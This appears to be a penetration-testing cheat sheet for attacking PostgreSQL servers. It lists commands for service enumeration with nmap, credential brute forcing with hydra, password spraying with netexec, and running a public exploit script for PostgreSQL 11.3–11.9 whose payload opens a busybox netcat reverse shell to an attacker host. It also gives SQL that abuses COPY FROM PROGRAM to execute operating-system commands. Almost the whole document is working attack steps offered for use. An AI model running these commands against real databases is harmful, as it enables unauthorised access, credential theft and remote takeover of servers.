PostgreSQL
1) Nmap scan
nmap -sV -p 5432,5433 --script "postgresql-info,postgresql-user-enum,postgresql-ssl" IP2) Brute force
hydra -L users.txt -P passwords.txt -s 5432 IP postgresql3) Password Spray
netexec postgres -d <DB_NAME> -u <USER> -p <PASSWORD> <ip>4) Login
psql -h <ip> -p 5432 -U <USER> -W5) RCE (PostgreSQL DB versions 11.3 - 11.9)
python3 50847.py -i <ip> -p 5437 -c "busybox nc $ATTACKER_IP 80 -e sh"6) Code Execution
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;7) Database Usage
Last updated